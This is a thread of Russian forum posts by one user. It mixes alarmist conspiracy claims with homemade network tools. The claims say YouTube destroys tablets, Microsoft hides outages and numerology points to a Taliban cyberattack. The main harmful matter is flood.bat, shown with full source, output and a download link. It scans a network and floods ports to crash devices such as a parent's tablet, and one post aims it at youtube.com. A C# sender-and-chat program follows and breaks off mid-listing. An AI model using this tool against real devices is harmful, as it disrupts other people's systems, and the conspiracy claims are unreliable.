pcixi.ru
Творческое объединение шизофреников
Лечение шизофрении творчеством и общением на pcixi.ru

Успешные хакерские взломы. Скачать свежие утечки и книги
Talomir #406 | Вторник, 30.07.2024, 17:33
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ПРЕДУПРЕЖДЕНИЕ БЕЗОПАСНОСТИ С YOUTUBE


Не смотрите youtube на планшетах с ОС Android (версия ОС не уточнена). Ошибки на серверах этого видеохостинга приводят к исчерпанию вторичной памяти планшета и он вообще перестаёт загружаться и работать. Для ремонта понадобилось бы выпаивать микросхему вторичной памяти и менять её или перепрошивать, что почти никто не делает - планшет с Андроид просто идёт в мусорку.

Пока не известно о таких проблемах при просмотре youtube на телефонах, этот способ опасно - не доказан.



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Вторник, 30.07.2024, 17:33
Статус: нет меня
 
Talomir #407 | Вторник, 30.07.2024, 21:46
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
МИКРОСОФТ ВРЁТ О НОВОМ ГЛОБАЛЬНОМ СБОЕ


В интернете начали распространяться новости о "новом сбое", глобальном, майкрософт. Однако этим новостям "сложно верить".

Так, на сайте https://portal.microsoft.com, отображающем статусы служб и сервисов компании, отображается All Is Well с работающими статусами всех служб и серверов, а тысячи пользователей "якобы жалуются на сбой" на портале отслеживания проблем https://downdetector.com

Кому верить в такой ситуации? По закону исключённого третьего, из двух противоречащих суждений одно является истинным, а второе ложным.

Микрософт может умалчивать о проблеме на статусах служб, чтобы не упали их акции, в которых инвестировано 3-5 триллионов долларов. Это мотив.

С другой стороны, на сайте https://downdetector.com могли "нажаловаться" боты вместо пользователей, капчи сайт не просит. То есть жалобы могли быть сгенерированы и добавлены сторонней программой, скриптом, с целью повлиять на цену акции Майкрософт и "навариться" на разнице в цене на рынке Форекс. Такой сценарий тоже нельзя отрицать. Мотив есть и у пользователей https://downdetector.com

Итак, новый сбой 30 июля произошёл или нет, мы об этом пока не знаем. Но по разнице чисел "сбоев" 30-19 = 11, всем известное 11 сентября с пентагоном и небоскрёбами всемирного торгового центра, можно предполагать кибернетическую атаку. Кибернетическую атаку на "КИ" - Критическую Инфраструктуру. И стоит за атакой скорее всего всем известное движение арабов-фанатиков "Талибан"!





Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Вторник, 30.07.2024, 21:48
Статус: нет меня
 
Talomir #408 | Среда, 31.07.2024, 14:23
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
СБОЙ ВСЕГО ИНТЕРНЕТА: ЧЕБУРАТОР ИЛИ КИБЕРНЕТИЧЕСКИЕ СПЕЦЫ

СБОЙ ЕСТЬ: О НЁМ УМАЛЧИВАЕТ СМИ


Служба отслеживания сетевых проблем https://downdetector.su показывает сегодня, 31 июля 2024 года, все две первых страницы мониторинга сайтами со сбоем. Всего около 40 банков, провайдеров, мобильных операторов, видеохостингов, глобальных хостингов картинок, мессенжеров и социальных сетей. Абнормальное количество жалоб на сервисы более 100 за сутки у всех этих обмеряемых сетевых порталов. То есть - происходит глобальный кибернетический сбой, аппокалипсис, цифровой армагедон.

Вероятными причинами наблюдаемого происходящего могут быть: размножающийся сетевой червь типа Червя Морриса, атака кибер-армии Украины с 220 000 хакеров, магнитные бури и климатические аномалии влияющие на качество радиосвязи интернета, математический резонанс последствий глобального сбоя Windows BSOD 19 июля 2024. Пользователям рекомендуется перейти на оффлайн-использование персональных компьютеров, сделав запасы программ, книг, видео и музыки. Похоже, это конец!





Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #409 | Среда, 31.07.2024, 16:11
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ГЛОБАЛЬНЫЙ СБОЙ ИНТЕРНЕТА 31 ИЮЛЯ НЕ ТОЛЬКО В РОССИИ

ЧИСЛО ДЕМОНА rwx = 666 ?














Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #410 | Четверг, 01.08.2024, 04:45
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ПРОГРАММА ФЛУДА ПОРТОВ В ЛОКАЛЬНОЙ СЕТИ


Иногда надо принудительно выключить или замедлить устройство типа планшета или телефона в локальной сети, когда вы не можете сделать это физически и оно вам мешает. Например, вас обрабатывают в доме с ютюба или планшета родителей. Для этого можно использовать простую программу flood.bat, исходные тексты которой приводятся ниже.

Программа имеет три режима работы: два режима сканирования хостов и один режим флуда мусором.

C:/>flood --scan 192.168.1

В этом режиме программа ищет доступные хосты в локальной подсети 192.168.1.1-255 и отображает на экра их имена. По имени хоста обычно можно сделать вывод что это за устройство, телефон там ноутбук или планшет, и тип его операционной системы.

Код
Ответ от 192.168.1.1: число байт=32 время=2мс TTL=64

Обмен пакетами с router.asus.com [192.168.1.1] с 32 байтами данных:
Ответ от 192.168.1.1: число байт=32 время=1мс TTL=64

Статистика Ping для 192.168.1.1:
    Пакетов: отправлено = 1, получено = 1, потеряно = 0
    (0% потерь)
Приблизительное время приема-передачи в мс:
    Минимальное = 1мсек, Максимальное = 1 мсек, Среднее = 1 мсек
Ответ от 192.168.1.63: число байт=32 время<1мс TTL=128

Обмен пакетами с WIN-J2G446M9P30 [192.168.1.63] с 32 байтами данных:
Ответ от 192.168.1.63: число байт=32 время<1мс TTL=128

Статистика Ping для 192.168.1.63:
    Пакетов: отправлено = 1, получено = 1, потеряно = 0
    (0% потерь)
Приблизительное время приема-передачи в мс:
    Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек


В примере запуска видно, что на адресе 192.168.1.1 находится роутер WiFi, а на адресе 192.168.1.63 находится ноутбук Windows

C:/>flood --scan2 192.168

Второй режим поиска хостов, ищет хосты в локальных подсетях 192.168.1-255.1-255 и отображает их адреса и имена

C:/>flood --crash 192.168.1.63

В цикле шлёт на порты 1-1024 вывод генератора мусора phrase.exe (генератор по умолчанию с элементами ИИ). Запущенный без ключа, генератор выводит на экран мусор в формате UNICODE, этот вывод перехватывается и шлётся на порт. Запущенный с ключом -a генератор выводит на экран мусор в формате ASCII или в бинарном формате, этот вывод перехватывается и шлётся на порт.

C:/>flood --crash 192.168.1.63 my_gen.exe

Вместо генератора по умолчанию можно написать свой генератор, и указать его в коммандной строке. В данном примере генератор называется my_gen.exe Всё что должен делать генератор - выводить на экран мусор в формате UNICODE запущенным без ключа и мусор в формате ASCII запущенным с ключом -a. На C# это делается инструкциями Console.WriteLine()

Программа представляет собой batch-скрипт на один экран, работает под всеми x64 версиями windows и использует netcat64 для посылки данных на порт. nc64 надо добавить в исключения антивируса, эту программулину используют не только для тестирования сетевых протоколов, но и для "взлома" в чужие компьютеры.

Код
@echo off

if "%1" == "--scan" goto Scan
if "%1" == "--scan2" goto Scan2
if "%1" == "--crash" goto Crash

echo FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024
echo USAGE:
echo flood.bat --scan 192.168.1                   find hosts on local net and shows their names and IP addresses
echo flood.bat --scan2 192.168                    find hosts on local net level 2 and shows their names and IP addresses
echo flood.bat --crash 192.168.1.187              flood with supplied phrase.exe generator (no and -a options of generator)
echo flood.bat --crash 192.168.1.187 my_gen.exe   flood with user's my_gen.exe trash generator

goto exit_me

:Crash

ping -n 1 -a %2

for /L %%P in (1,1,1024) do (

echo Pong %2 %%P TCP unicode
if "%3" == "" (cmd /C phrase.exe|nc64 -n -w 1 %2 %%P) else (cmd /C %3|nc64 -n -w 1 %3 %%P)

echo Pong %2 %%P TCP ascii
if "%3" == "" (cmd /C phrase.exe -a|nc64 -n -w 1 %2 %%P) else (cmd /C %3 -a|nc64 -n -w 1 %3 %%P)
)

goto Crash

:Scan
for /L %%Q in (0,1,255) do (
    ping -n 1 -w 12 %2.%%Q | find "TTL"
    if not errorlevel 1 ping -n 1 -w 20 -a %2.%%Q
)
goto exit_me

:Scan2
for /L %%Q in (0,1,255) do (
    for /L %%R in (0,1,255) do (
  ping -n 1 -w 12 %2.%%Q.%%R | find "TTL"
  if not errorlevel 1 ping -n 1 -w 20 -a %2.%%Q.%%R
    )
)
  
:exit_me


Скачать архив с программой, сетевым котом и интеллектуальным генератором мусора phrase.exe (пароль 123). Обновлено: netcat заменён на более быстрый pipesend.exe на си-шарпе, с исходниками.

hack-13-pipesend-flood.7z



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Четверг, 01.08.2024, 16:26
Статус: нет меня
 
Talomir #411 | Четверг, 01.08.2024, 13:07
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
УСКОРЯЕМ ПРОГРАММУ ФЛУДА ПОРТОВ. BEGINNERS TUTORIAL


После того как я написал скрипт флуда портов с использованием ping.exe, phrase.exe и nc64.exe, стало понятно, что он очень медленный: проход по диапазону 1-1024 системных портов суперпользователя занимает несколько часов. И тормозит, очевидно, nc64 (netcat).

Но где он может тормозить? Классика - использование стандартного блокирующего метода сокетов Connect(), если порт закрыт, программа вынуждена ждать пол минуты.

Переписывать netcat, хоть исходники и есть, мы не станем, так как наша задача - поправить программу максимально быстро. А возьмём для этого язык быстрой разработки "приложений" C-шарп с богатым набором системных и сетевых функций. И перепишем netcat, для ускорения, минимальный функционал, который нужен для посылки файла или стандартного ввода программы на TCP порт удалённого устройства. И заменим в скрипте флуда nc64 на нашу новую программу, которую назовём pipesend.

Как всегда, получаем по ip\hostname IPAddress, создаём TCP сокет и вместо метода Socket.Connect вызываем Socket.BeginConnect, получив асинхронный результат. Далее, ждём методом WaitOne 50 миллисекунд и проверяем, Socket.IsConnected. Если за 50 миллисекунд установить соединение с портом не получилось, выходим из программы - порт закрыт. Так мы не ждём пол минуты ответа от закрытого порта и не тормозим проход по всем 1024 портам суперпользователя!

Программа pipesend.cs получилась на один экран, исходники - ниже

Код
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Net;
using System.Net.Sockets;
using System.IO;
using System.Threading;

namespace pipesend
{
    class Program
    {
        static bool done = false;
        static void Main(string[] args)
        {
            if (args.Length != 2)
            {
                Console.WriteLine("pipesend: send a file to remote tcp port. Version 1.0");
                Console.WriteLine("USAGE: pipesend host_or_ip port <file.dat");
                Console.WriteLine("EXAMPLE: echo AA|pipesend 192.168.1.1 80");
                return;
            }

            try
            {
                IPAddress ip = Dns.GetHostAddresses(args[0])[0];
                int port = Int32.Parse(args[1]);

                Socket sok = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                sok.ReceiveTimeout = 200;
                sok.SendTimeout = 1000;

                IAsyncResult result = sok.BeginConnect(ip, port, null, null);

                bool success = result.AsyncWaitHandle.WaitOne(50, true);

                if (sok.Connected)
                {
                    sok.EndConnect(result);

                    NetworkStream ns = new NetworkStream(sok);

                    Stream fs = Console.OpenStandardInput();

                    while (fs.CanRead)
                    {
                        Thread.Sleep(100);

                        byte[] buf = new byte[8192];

                        int r = fs.Read(buf, 0, buf.Length);

                        if (r > 0) { ns.Write(buf, 0, r); Console.Write("."); }
                        else break;
                    }

                    done = true;
                    try { ns.Close(); } catch { }
                    try { fs.Close(); } catch { }
                    
                }
                try { sok.Shutdown(SocketShutdown.Both); } catch { }
                try { sok.Close(); } catch { }

            } catch { }

            if (done) Console.WriteLine("ok");
            else Console.WriteLine("error");
            
        }
    }
}


Также, поправим скрипт flood.bat для добавления ещё двух режимов: сканирования портов на хосте, часто надо, и флуда конкретного порта вместо всех 1024 портов. Поправленный скрипт на экран приведён ниже.

Код
@echo off

if "%1" == "--scan" goto Scan
if "%1" == "--scan2" goto Scan2
if "%1" == "--scanports" goto Scanports
if "%1" == "--crash" goto Crash
if "%1" == "--crashport" goto Crashport

echo FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024 or a given port
echo USAGE:
echo flood --scan 192.168.1                   find hosts on local net and shows their names and IP addresses
echo flood --scan2 192.168                    find hosts on local net level 2 and shows their names and IP addresses
echo fllod --scanports 192.168.1.1            scan open ports on given host
echo flood --crash 192.168.1.187              flood with supplied phrase.exe generator (no and -a options of generator)
echo flood --crash 192.168.1.187 my_gen.exe   flood with user's my_gen.exe trash generator
echo flood --crashport 192.168.1.187 80       flood port with supplied phrase.exe generator (no and -a options of generator)
echo flood --crashport 192.168.1.187 80 my.exe     flood port with user's my.exe generator

goto exit_me

:Crash

for /L %%P in (1, 1, 1024) do (

echo Pong %2 %%P TCP unicode
if "%3" == "" (cmd /C phrase.exe|pipesend %2 %%P) else (cmd /C %3|pipesend %3 %%P)

echo Pong %2 %%P TCP ascii
if "%3" == "" (cmd /C phrase.exe -a|pipesend %2 %%P) else (cmd /C %3 -a|pipesend %3 %%P)
)

goto Crash

:Crashport

echo Pong %2 %3 TCP unicode
if "%4" == "" (cmd /C phrase.exe|pipesend %2 %3) else (cmd /C %4|pipesend %2 %3)

echo Pong %2 %3 TCP ascii
if "%4" == "" (cmd /C phrase.exe -a|pipesend %2 %3) else (cmd /C %4 -a|pipesend %2 %3)

goto Crashport

:Scan
for /L %%Q in (0, 1, 255) do (
    ping -n 1 -w 12 %2.%%Q | find "TTL"
    if not errorlevel 1 ping -n 1 -w 20 -a %2.%%Q
)
goto exit_me

:Scan2
for /L %%Q in (0, 1, 255) do (
    for /L %%R in (0, 1, 255) do (
  ping -n 1 -w 12 %2.%%Q.%%R | find "TTL"
  if not errorlevel 1 ping -n 1 -w 20 -a %2.%%Q.%%R
    )
)
goto exit_me

:Scanports
for /L %%Q in (1, 1, 1024) do (
    echo GET|pipesend %2 %%Q | find "ok"
    if not errorlevel 1 echo %%Q open tcp
)
goto exit_me
  
:exit_me


И, теперь, приведём вывод на консоль работающего в локальной сети флудера tcp-портов flood.bat

Код
FLOOD.BAT: flood local ip with generator's garbage to ports 1-1024 or a given port
USAGE:
flood --scan 192.168.1                   find hosts on local net and shows their names and IP addresses
flood --scan2 192.168                    find hosts on local net level 2 and shows their names and IP addresses
fllod --scanports 192.168.1.1            scan open ports on given host
flood --crash 192.168.1.187              flood with supplied phrase.exe generator (no and -a options of generator)
flood --crash 192.168.1.187 my_gen.exe   flood with user's my_gen.exe trash generator
flood --crashport 192.168.1.187 80       flood port with supplied phrase.exe generator (no and -a options of generator)
flood --crashport 192.168.1.187 80 my.exe     flood port with user's my.exe generator

C:/> flood --scan 196.168.1

Ответ от 192.168.1.1: число байт=32 время=4мс TTL=64

Обмен пакетами с router.asus.com [192.168.1.1] с 32 байтами данных:
Ответ от 192.168.1.1: число байт=32 время=4мс TTL=64

Статистика Ping для 192.168.1.1:
    Пакетов: отправлено = 1, получено = 1, потеряно = 0
    (0% потерь)
Приблизительное время приема-передачи в мс:
    Минимальное = 4мсек, Максимальное = 4 мсек, Среднее = 4 мсек
Ответ от 192.168.1.41: число байт=32 время=72мс TTL=64

Обмен пакетами с 192.168.1.41 по с 32 байтами данных:
Ответ от 192.168.1.41: число байт=32 время=38мс TTL=64

Статистика Ping для 192.168.1.41:
    Пакетов: отправлено = 1, получено = 1, потеряно = 0
    (0% потерь)
Приблизительное время приема-передачи в мс:
    Минимальное = 38мсек, Максимальное = 38 мсек, Среднее = 38 мсек
Ответ от 192.168.1.63: число байт=32 время<1мс TTL=128

Обмен пакетами с WIN-J2G446M9P30 [192.168.1.63] с 32 байтами данных:
Ответ от 192.168.1.63: число байт=32 время<1мс TTL=128

Статистика Ping для 192.168.1.63:
    Пакетов: отправлено = 1, получено = 1, потеряно = 0
    (0% потерь)
Приблизительное время приема-передачи в мс:
    Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек
Ответ от 192.168.1.187: число байт=32 время=4мс TTL=64

Обмен пакетами с Galaxy-M52-5G [192.168.1.187] с 32 байтами данных:
Ответ от 192.168.1.187: число байт=32 время=14мс TTL=64

Статистика Ping для 192.168.1.187:
    Пакетов: отправлено = 1, получено = 1, потеряно = 0
    (0% потерь)
Приблизительное время приема-передачи в мс:
    Минимальное = 14мсек, Максимальное = 14 мсек, Среднее = 14 мсек
Ответ от 192.168.1.241: число байт=32 время=67мс TTL=64

Обмен пакетами с Vladimirs-MBP [192.168.1.241] с 32 байтами данных:
Ответ от 192.168.1.241: число байт=32 время=28мс TTL=64

Статистика Ping для 192.168.1.241:
    Пакетов: отправлено = 1, получено = 1, потеряно = 0
    (0% потерь)
Приблизительное время приема-передачи в мс:
    Минимальное = 28мсек, Максимальное = 28 мсек, Среднее = 28 мсек
    
C:/> flood --scanports 192.168.1.1
    
.ok
53 open tcp
.ok
80 open tcp
.ok
515 open tcp

C:/>flood --crashport 192.168.1.1 80

Pong 192.168.1.1 80 TCP unicode
.ok
Pong 192.168.1.1 80 TCP ascii
..ok
Pong 192.168.1.1 80 TCP unicode
.ok
Pong 192.168.1.1 80 TCP ascii
..ok
Pong 192.168.1.1 80 TCP unicode
.ok
Pong 192.168.1.1 80 TCP ascii
.ok
Pong 192.168.1.1 80 TCP unicode
.ok
Pong 192.168.1.1 80 TCP ascii
..error
Pong 192.168.1.1 80 TCP unicode
....error
Pong 192.168.1.1 80 TCP ascii
..error
Pong 192.168.1.1 80 TCP unicode
.ok
Pong 192.168.1.1 80 TCP ascii
.ok
Pong 192.168.1.1 80 TCP unicode
.ok
Pong 192.168.1.1 80 TCP ascii
..error
Pong 192.168.1.1 80 TCP unicode
....error
Pong 192.168.1.1 80 TCP ascii
.ok
Pong 192.168.1.1 80 TCP unicode
.ok
Pong 192.168.1.1 80 TCP ascii
.ok
Pong 192.168.1.1 80 TCP ascii
.Завершить выполнение пакетного файла [Y(да)/N(нет)]? y


Ссылку на скачивание исходников и бинарников обновлю в предыдущем посте...! Качайте.



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #412 | Четверг, 01.08.2024, 14:04
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
Кстати, скриптом flood.bat можно пользоваться не только для локальной сети, но и для интернет-серверов. Ниже, например, пример скана https://www.youtube.com на открытые tcp-порты суперпользователя:

C:/> flood --scanports www.youtube.com

Код
.ok
80 open tcp
.ok
443 open tcp


C:/> flood --crashport www.youtube.com 443



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #413 | Четверг, 01.08.2024, 14:45
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
TALK FOR WINDOWS: ПРОСТОЙ ЧАТ НА ДВУХ КОМАНДАХ


Под операционной системой UNIX изначально была утилита talk, которая позволяла поговорить с любым пользователем сервера по сети. При этом не было никакой привязки к телефону с ФИО, оплаты по тарифу за переговоры, и других проблем современных чат-монополистов. Под Windows такой утилиты не было.

В этом посте я рассказываю как сделать скрипт-чат на Windows при помощи двух команд, netcat (nc64.exe) и pipesend.exe

Для приёма сообщений: C:/> nc64 -L -p 8888

Эта команда начинает слушать порт 8888 и печатать входящие символы в своё окно (на экран, как говорили ранее)

Для посылки сообщений: C:/> pipesend 192.168.1.63 8888

Эта команда открывает консоль по чтению и пересылает все вводимые символы на удалённый TCP порт, 8888 в данном случае, который слушает netcat и печатает символы на экран.

Всё, при помощи pipesend можно говорить с любым, у кого на порту запущен netcat. Если вы находитесь с собеседником не в реальной сети, то у него должен быть реальный ip адрес, иначе соединение не зайдёт в NAT-локалку! Фото работы программ ниже:



Не надо платить Дурову за телеграм и говорить на прослушку ФСБ и психиатрической службы!



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #414 | Четверг, 01.08.2024, 16:29
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
УЛУЧШАЕМ СКРИПТ-ЧАТ: ОДНА КОМАНДА

Добавил режим прослушивания сокета --listen в утилиту pipesend, теперь можно сделать хак-чат без запрещённого nc64.exe

Для приёма сообщений: C:/> pipesend --listen 8888

Для посылки сообщений: C:/> pipesend 127.0.0.1 8888



Обновил ссылку на скачивание выше...

Код
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Net;
using System.Net.Sockets;
using System.Net.NetworkInformation;
using System.IO;
using System.Threading;

namespace pipesend
{
    class Program
    {
        static bool done = false;
        static int port = 80;
        static void Main(string[] args)
        {
            if (args[0].Equals("-h") || args[0].Equals("--help"))
            {
                Console.WriteLine("pipesend: send a file to remote tcp port. Version 1.0");
                Console.WriteLine("USAGE: pipesend host_or_ip port <file.dat");
                Console.WriteLine("EXAMPLE: echo AA|pipesend 192.168.1.1 80");
                Console.WriteLine("USAGE: pipesend --listen port");
                Console.WriteLine("EXAMPLE: pipesend --listen 80");
                return;
            }

            try
            {
                port = Int32.Parse(args[1]);

                if (args[0].Equals("--listen"))
                {
                    Task.WaitAll(Task.Run(BindAllInterfaces));
                    return;
                }

                IPAddress ip = Dns.GetHostAddresses(args[0])[0];

                Socket sok = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                sok.ReceiveTimeout = 200;
                sok.SendTimeout = 1000;

                IAsyncResult result = sok.BeginConnect(ip, port, null, null);

                bool success = result.AsyncWaitHandle.WaitOne(50, true);

                if (sok.Connected)
                {
                    sok.EndConnect(result);

                    NetworkStream ns = new NetworkStream(sok);

                    Stream fs = Console.OpenStandardInput();

                    while (fs.CanRead)
                    {
                        Thread.Sleep(100);

                        byte[] buf = new byte[8192];

                        int r = fs.Read(buf, 0, buf.Length);

                        if (r > 0) { ns.Write(buf, 0, r); Console.Write("."); }
                        else break;

                        ns.Flush();
                    }

                    done = true;
                    try { ns.Close(); } catch { }
                    try { fs.Close(); } catch { }
                    
                }
                try { sok.Shutdown(SocketShutdown.Both); } catch { }
                try { sok.Close(); } catch { }

            } catch { }

            if (done) Console.WriteLine("ok");
            else Console.WriteLine("error");
            
        }

        protected static async Task BindAllInterfaces()
        {
            try
            {
                List<IPAddress> ip = new List<IPAddress>();
                NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces();
                foreach (NetworkInterface netInterface in allNetworkInterfaces)
                {
                    foreach (UnicastIPAddressInformation addr2 in netInterface.GetIPProperties().UnicastAddresses)
                    {
                        try
                        {
                            if (addr2.IPv4Mask.Address != 0L)
                    ip.Add(addr2.Address);
                        }
                        catch { }
                    }
                }
                List<Task> list = new List<Task>();
                foreach (IPAddress addr in ip)
                {
                    try
                    {
                        BindSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                        BindSocket.Bind(new IPEndPoint(addr, port));
                        BindSocket.Listen(500);
                        list.Add(Task.Run(Accepter));
                    }
                    catch { }

                    await Task.Delay(1000);
                }
                Task.WaitAll(list.ToArray<Task>());
            }
            catch { }
        }

        static Socket BindSocket = null;
        static Socket data = null;
        static async Task Accepter()
        {
            Socket bind = BindSocket;
            bind.ReceiveTimeout = 256;

            while (true)
                try
                {
                    data = bind.Accept();
                    if (data == null)
                    {
                        await Task.Delay(30);
                        continue;
                    }
                    data.ReceiveTimeout = 100000;
                    Task.Run(SocketReader);
                    await Task.Delay(500);
                }
                catch { }
        }

        static async Task SocketReader()
        {
            Socket DataSocket = data;
            try
            {
                Stream fs = Console.OpenStandardOutput();
                NetworkStream ns = new NetworkStream(DataSocket);

                while (ns.CanRead)
                {
                    byte[] buf = new byte[8192];

                    int r = ns.Read(buf, 0, buf.Length);

                    if (r < 0) break;
                    else fs.Write(buf, 0, r);

                    fs.Flush();
                }
                try { fs.Close(); } catch { }
                try { ns.Close(); } catch { }
            }
            catch { }

            try { DataSocket.Shutdown(SocketShutdown.Both); } catch { }
            try { DataSocket.Close(); } catch { }
            
        }
    }
}



Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Сообщение отредактировал(а) Talomir - Четверг, 01.08.2024, 16:29
Статус: нет меня
 
Talomir #415 | Четверг, 01.08.2024, 19:20
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ФОТО: СКРИПТ-ЧАТ НА ОДНОЙ КОММАНДЕ DOS-А, ВМЕСТО ТЕЛЕГРАМА




Ламеры ламают, хакеры - поламывают. Ламеры хромают, хакеры - прихрамывают.
Моя лучшая хакерская тема: https://pcixi.ru/forum/78-11690-1
Моя последняя крутая тема: https://pcixi.ru/forum/78-11690-1
Статус: нет меня
 
Talomir #416 | Пятница, 02.08.2024, 12:08
Автор темы
Повелитель буйных
Поступившие в отделение
Юзер-бар +
ГРУППОВОЙ ЧАТ С ИСХОДНИКАМИ ВСЕГО НА ДВА ЭКРАНА

WINDOWS LINUX MACOS


Раз уж я переписываю запрещённый netcat для своих нужд, и для релиза, то сразу добавил и чат (аналог talk в UNIX) и сделал его групповым. В режиме сервера pipesend биндит перечисляемые в аргументах запуска интерфейсы и ждёт подключений. Пересылаемые по подключениям данные сразу рассылаются по всему массиву подключений, пишет один - читают многие. Также, можно пересылать и текстовые файлы, перенаправив ввод клиента pipesend на файл. Исходники приведу ниже.

1 - чат без шифрования

На сервере с реальным ip: C:/> pipesend --listen 8888 127.0.0.1 192.168.1.63

слушать порт 8888 на интерфейсах 127.0.0.1 и внешнем ip (тут он указан гипотетический)

На клиентах без реального ip: C:> pipesend 192.168.1.63 8888

клиент соединяется с сервером, посылает и принимает текстовые сообщения. Нажимать enter дважды для пересылки своей фразы, чужие фразы отображаются автоматически. Работает и русский язык!

На клиенте для передачи текстового файла: C:/> pipesend 192.168.1.63 <file.txt

Для чата с шифрованием: запускаем pipesend на linux-сервере на интерфейсе 127.0.0.1 и добавляем в SSH пользователей для захода на linux и запуска pipesend 127.0.0.1 8888, так весь трафик будет зашифрован по открытому ключу OpenSSL.

Фотка разговора:



Фотка посылки текстового файла с исходниками:



Исходники на C# (скачать можно будет на днях, я дам ссылку когда поправлю флудер портов с использованием pipesend)

Код
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Net;
using System.Net.Sockets;
using System.Net.NetworkInformation;
using System.IO;
using System.Threading;

namespace pipesend
{
    class Program
    {
        static bool done = false;
        static int port = 8888;
        static void Main(string[] args)
        {
            if (args.Length < 2 || args[0].Equals("-h") || args[0].Equals("--help"))
            {
                Console.WriteLine("pipesend: send a file to remote tcp port or run a chat-server, version 1.1");
                Console.WriteLine("USAGE: pipesend host_or_ip port <file.dat");
                Console.WriteLine("EXAMPLE: echo AA|pipesend 192.168.1.1 80");
                Console.WriteLine("USAGE: pipesend --listen port local_ip1 [local_ip2 local_ip3...]");
                Console.WriteLine("EXAMPLE: pipesend --listen 8888 127.0.0.1");
                return;
            }

            try { port = Int32.Parse(args[1]); } catch { }

            if (args[0].Equals("--listen"))
            {
                List<Task> list = new List<Task>();

                for (int i = 2; i < args.Length; i++)
                    try
                    {
                        IPAddress addr = Dns.GetHostAddresses(args[i])[0];
                        BindSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                        BindSocket.Bind(new IPEndPoint(addr, port));
                        BindSocket.Listen(500);
                        list.Add(Task.Run(Accepter));

                        Thread.Sleep(1000);
                    }
                    catch { }

                Task.WaitAll(list.ToArray<Task>());
            }
            else
                try
                {
                    IPAddress ip = Dns.GetHostAddresses(args[0])[0];

                    Socket sok = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                    sok.ReceiveTimeout = 300;
                    sok.SendTimeout = 300;

                    IAsyncResult result = sok.BeginConnect(ip, port, null, null);

                    bool success = result.AsyncWaitHandle.WaitOne(100, true);

                    if (sok.Connected)
                    {
                        //sok.EndConnect(result);

                        Stream fs = Console.OpenStandardInput();
                        Stream os = Console.OpenStandardOutput();

                        while (true)
                        {
                            byte[] buf;

                            int r = 0;

                            if (!Console.IsInputRedirected)
                            {
                    buf = new byte[1];
                    if (Console.KeyAvailable) r = fs.Read(buf, 0, buf.Length);
                            }
                            else
                            {
                    buf = new byte[8192];
                    r = fs.Read(buf, 0, buf.Length);
                            }
                            if (r > 0)
                            {
                    byte[] sbuf = new byte[r];

                    for (int i = 0; i < r; i++) sbuf[i] = buf[i];

                    sok.Send(sbuf);

                    if (!Console.IsInputRedirected) continue;
                            }
                            else if (Console.IsInputRedirected) break;

                            try
                            {
                    byte[] rbuf = new byte[8192];

                    int a = 0;

                    if (sok.Available > 0) a = sok.Receive(rbuf);
                    if (a > 0) { os.Write(rbuf, 0, a); os.Flush(); }
                            }
                            catch { }
                        }

                        done = true;
